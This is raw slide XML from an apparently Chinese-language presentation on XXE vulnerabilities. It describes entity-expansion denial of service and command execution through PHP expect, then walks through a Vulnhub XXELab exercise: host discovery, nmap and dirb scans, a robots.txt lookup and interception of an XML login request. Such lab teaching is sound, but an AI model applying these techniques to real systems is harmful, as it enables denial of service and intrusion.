                <a:effectLst/>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>lol9</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="50505C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>的实体声明引用了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="50505C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="50505C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="50505C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>lol8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="50505C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>实体，而</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="50505C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>lol8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="50505C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>也引用了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="50505C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="50505C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="50505C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>lol7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="50505C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>实体，以上过程不断展开，一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="50505C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="50505C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="50505C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="50505C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>小于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="50505C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>1K)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="50505C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>实际上占用了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="50505C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>3000M</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="50505C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>字节的内存，这将造成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="50505C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>DOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="50505C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>攻击。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="50505C"/>
              </a:solidFill>
              <a:effectLs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50505C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="50505C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="50505C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>上，我们还可以使用无尽随机字节流来让程序一直加载外部实体，程序一直不会结束，从而产生</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="50505C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>DOS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="50505C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>攻击</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50000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>在配置不当</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>开发内部应用情况下（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>PHP expect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>模块被加载到了易受攻击的系统或处理</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>的内部应用程序上），攻击者能够通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>XXE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>执行代码。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="4D4D4D"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="-apple-system"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>图中我们设置的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>可以执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>who an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>命令得到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="50505C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>运行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="50505C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="50505C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>程序的用户名</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="85000"/>
                  <a:lumOff val="15000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="灯片编号占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A81278A3-F0F7-42E0-B1AA-AA18437D644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华文宋体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文宋体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>接下来由我介绍</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B9998D"/>
                </a:solidFill>
                <a:latin typeface="华文宋体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文宋体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>vulnhub虚拟机靶场实战</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="灯片编号占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{EA43AF24-E1A5-49B7-A527-0F71E9AC1EDA}"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Vulnhub是一个提供各种漏洞环境的靶场平台，供安全爱好者学习渗透使用。我们本次实验目的是通过信息收集获取靶机XXE网站地址，利用协议进行XXE漏洞利用，获取靶机flag。这次实验环境是靶机为XXELab、ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>=192.168.235.144</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1200" dirty="0"/>
              <a:t>，攻击机为kaliLinux ，ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200" dirty="0"/>
              <a:t>=192.168.235.143</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首先实战前收集基本信息，第一步先查看</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>kali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>地址：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ifconfig</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，得到本机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ip192.168.235.143</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err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>使用netdiscover扫描本地网络主机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，找到目标机</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ip192.168.235.144</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en-US" altLang="zh-CN" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>使用nmap扫描</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，可以看到机器开放了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>80</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>5355</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>端口</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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>浏览器访问</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>192.168.235.144</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>机器的80端口</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>出现</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>apache</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>界面</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="灯片编号占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A81278A3-F0F7-42E0-B1AA-AA18437D644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dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>使用dirb扫描1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>92.168.235.144</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>机器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>看是否有隐藏目录</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>发现</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>敏感文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>robots.txt，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>之前实验中也见过这样的文件名，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>此文件包含了互联网上的网页信息</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>浏览器访问robots.txt，查看robots.txt文件内容</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>,发现存在后台管理页面admin.php和xxe网站</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </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err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>访问xxe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>如下图，访问</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" err="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>admin.php</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> 404</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" dirty="0">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>了</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43AF24-E1A5-49B7-A527-0F71E9AC1EDA}"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随便输入账号密码后进行抓包</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>可以发现请求正文为XML结构，尝试利用XXE注入。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="灯片编号占位符 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
